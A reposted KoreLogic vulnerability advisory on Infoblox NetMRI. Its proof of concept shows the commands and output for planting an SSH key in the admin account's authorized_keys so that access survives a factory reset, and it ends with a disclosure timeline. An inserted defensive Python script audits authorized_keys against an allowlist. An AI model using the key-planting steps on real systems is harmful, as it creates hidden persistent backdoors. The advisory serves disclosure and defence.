Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence

Posted Oct 25, 2017
Authored by Matthew Bergin | Site korelogic.com

Infoblox NetMRI version VM-AD30-5C6CE suffers from an administration shell factory reset persistence vulnerability.

tags | exploit, shell
MD5 | 3d645a515c1de250781ae9cab7fd9d5c

KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory Reset Persistence

Title: Infoblox NetMRI Administration Shell Factory Reset Persistence
Advisory ID: KL-001-2017-018
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-018.txt


1. Vulnerability Details

Affected Vendor: Infoblox
Affected Product: NetMRI
Affected Version: VM-AD30-5C6CE
Platform: Embedded Linux
CWE Classification: CWE-485: Insufficient Encapsulation
Impact: Administrative Account Backdoor
Attack vector: SSH

2. Vulnerability Description

An authenticated user who has escaped the management shell
can install a public SSH key which will survive factory resets.

3. Technical Description

1. Create an SSH keypair.

$ ssh-keygen -f netrmi-backdoor
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in netrmi-backdoor.
Your public key has been saved in netrmi-backdoor.pub.
The key fingerprint is:
1e:d6:55:7b:f6:a1:a5:9f:ea:8d:2b:4d:5d:ae:9e:19 fake@fake
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| . . |
| . .oo|
| . . +o+|
| S . o..o|
| o . ...o|
| . o E+ |
| . .=+ |
| o*=. |
+-----------------+

2. As 'admin' from an escaped shell, append the public key to authorized_keys with echo.

[admin@NetMRI-VM-AD30-5C6CE ~]$ echo ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDmjcavayYmGgsNUggeILWSw8qGKAZeWkH/01oP/1M8d249zYBJRHri0hJn13DItuOCn/1/RWxFQsUtoph2dHsAnOYPZXEXofPfmWbqOdaOOK+TbrMAgc0CdgKtIDE01LHob4S8s4N//jCHGWUQzv5KAUebRUtR1K7STAQdMnKbhZeoUBoVgvekjnZZ+3gFGg6C7FDg3Z8VstWYJmqxo7N4awEI95fnJ551O4sr9owdIwoZ5OhO0cbt8HGzoCsdbinICKUg3CIhfnmLnNfHtySmBf6srFx7QQ3Gy5lmW7nXNEYrDoXc37H+mpSR0rtPtuWr9GolP9ccHbbIyQXL6frV
fake@fake >> /home/admin/.ssh/authorized_keys
[admin@NetMRI-VM-AD30-5C6CE ~]$ exit
exit
[admin@NetMRI-VM-AD30-5C6CE Backup]$ exit
exit
ping: IDN encoding of '' failed with error code 5

3. Factory reset the system using the management shell.

NetMRI-VM-AD30-5C6CE> ?

Available Commands:
acl ftp md5sum register setup
autoupdate grep more remoteCopy show
cat halt netstat removedsb snmpwalk
clear help ping removemib ssh-key
configure installdsb provisiondisk repair supportbundle
debug installhelpfiles quit reset telnet
deregister installmib rdtclient restore tftpsync
diagnostic license reboot rm top
exit ls recalculate-spm route traceroute
export maintenance refreshgroups set

NetMRI-VM-AD30-5C6CE> reset

Reset Commands:
admin cli snmp tunclient
all_licenses database system

NetMRI-VM-AD30-5C6CE> reset system

*******************************************************************
WARNING WARNING WARNING WARNING WARNING

This script deletes the network database, all database archive
files, all server logs, all issue details, all files stored
in the administrator shell directory and all user logins.
This script also resets the administrator password to 'admin'
and erases all customer-specific configuration information.

WARNING WARNING WARNING WARNING WARNING
*******************************************************************

Do you really want to reset (y|n)? [n]y

+++ Stopping Server ...
+++ Clearing MQ data ...
+++ Removing Server Logs ...
+++ Removing User Logins ...
+++ Resetting Admin Password ...
+++ Clearing Network Database ...
+++ Clearing All Config Files ...
+++ Clearing subscribers and subscriptions ...
+++ Clearing reports ...
+++ Clearing device support bundles ...
+++ Removing Certificates ...
+++ Rebuilding database ...
+++ Restoring pre-packaged policies ...
+++ Resetting Server Configuration ...
Server is down, skipping comm server restart
+++ Installing Weekly Maintenance Process ...
+++ Resetting Server Name ...
+++ Resetting Banner Logo ...
+++ Resetting Network Interfaces ...
+++ Processing Interface eth0 ...
+++ Processing Interface eth1 ...
+++ Processing Interface eth2 ...
+++ Processing Interface eth3 ...
+++ Resetting DNS Configuration ...
+++ Clearing Admin Directory ...
+++ Resetting Firewall Settings ...
+++ Resetting Time Zone ...
+++ Resetting Security Settings ...

#############################################################
The system needs to be rebooted to complete the reset process
#############################################################

Enter 'reboot' or 'halt' [reboot]: reboot
+++ Reset Complete

+++ Rebooting System ...

Broadcast message from admin@NetMRI-VM-AD30-5C6CE on pts/0 (Mon, 13 Mar 2017 18:59:02 -0400):

The system is going down for reboot NOW!

Connection to 1.3.3.7 closed by remote host.

4. Log in to the system using the private key.

$ ssh -i netrmi-backdoor admin@1.3.3.7
NetMRI VM-AD30-5C6CE
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.
Last login: Mon Mar 13 17:00:07 2017 from 1.3.3.7

************************************************************************
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM
EXTENT ALLOWED BY APPLICABLE LAWS.
************************************************************************

NetMRI Administrative Shell
---------------------------

Available Commands:
acl ftp md5sum register setup
autoupdate grep more remoteCopy show
cat halt netstat removedsb snmpwalk
clear help ping removemib ssh-key
configure installdsb provisiondisk repair supportbundle
debug installhelpfiles quit reset telnet
deregister installmib rdtclient restore tftpsync
diagnostic license reboot rm top
exit ls recalculate-spm route traceroute
export maintenance refreshgroups set

NetMRI-VM-AD30-5C6CE>

4. Mitigation and Remediation Recommendation

There is no known remediation for this vulnerability from the
vendor. Administrators should heavily restrict access to any
account of any privilege which can use the ping command in
the NetMRI CLI.

Network access to management interfaces should be properly segmented.

Assuming the lack of input sanitization in the NetMRI CLI is not
addressed: use that same vulnerability to check for the existence
of any SSH keys in the admin account's authorized_keys. No keys
should be present.
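The check the mitigation section asks for, as an added example that is not code from the advisory or from Infoblox: it parses the contents of an authorized_keys file (the PoC appends to /home/admin/.ssh/authorized_keys), fingerprints every key the way ssh-keygen -lf does, confirms the key blob really carries the declared key type, and reports anything not on an explicit allowlist. The sample file contents, the allowlisted operator key and the planted key are constructed here and are not real keys.

```python
import base64
import hashlib
import struct

KEY_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")

def fingerprint(blob):
    """SHA256 fingerprint in the form ssh-keygen -lf prints."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def parse_authorized_keys(text):
    """One (type, blob, comment) per key line; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        fields = raw.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as from= or command= may precede the key type.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_PREFIXES)), len(fields))
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
            entries.append((fields[idx], blob, " ".join(fields[idx + 2:])))
        except (IndexError, ValueError):
            entries.append((None, None, raw.strip()))  # keep it: a tampered line is a finding too
    return entries

def audit(text, allowed):
    """Return (fingerprint_or_text, reason) for each entry that is not an expected, well-formed key."""
    findings = []
    for ktype, blob, comment in parse_authorized_keys(text):
        if blob is None or len(blob) < 4:
            findings.append((comment, "unparseable entry"))
            continue
        (n,) = struct.unpack(">I", blob[:4])
        embedded = blob[4:4 + n].decode(errors="replace")  # type string stored inside the blob
        fp = fingerprint(blob)
        if embedded != ktype:
            findings.append((fp, "declared %s but blob is %s" % (ktype, embedded)))
        elif fp not in allowed:
            findings.append((fp, "not on allowlist: %s" % comment))
    return findings

def make_blob(key_type, key_bytes):
    """Minimal SSH wire-format blob for constructed sample data (not a real key)."""
    return struct.pack(">I", len(key_type)) + key_type.encode() + struct.pack(">I", len(key_bytes)) + key_bytes

# Constructed sample: one approved operator key and one planted key like the PoC's.
GOOD, PLANTED = make_blob("ssh-ed25519", b"\x01" * 32), make_blob("ssh-ed25519", b"\x02" * 32)
SAMPLE = ('# managed by configuration management\n'
          'from="10.0.0.5" ssh-ed25519 %s ops@jumphost\n'
          'ssh-ed25519 %s fake@fake\n') % (base64.b64encode(GOOD).decode(), base64.b64encode(PLANTED).decode())
```

Run audit(SAMPLE, {fingerprint(GOOD)}) to see the planted key reported; on an appliance, read the file over the escaped shell and pass its text in, and an empty result is the expected state after a factory reset.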

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.21 - KoreLogic requests security contact and PGP key from
Infoblox.
2017.07.21 - Infoblox suggests 'security_support@infoblox.com' with
PGP key id 0xC4AB2799.
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.
2017.07.31 - 5 business days have elapsed since the vulnerability
was reported. No response from Infoblox.
2017.09.15 - KoreLogic requests update from Infoblox.
2017.09.26 - 45 business days have elapsed since the vulnerability
was reported to Infoblox.
2017.10.17 - KoreLogic requests an update from Infoblox.
2017.10.18 - 60 business days have elapsed since the vulnerability
was reported to Infoblox.
2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
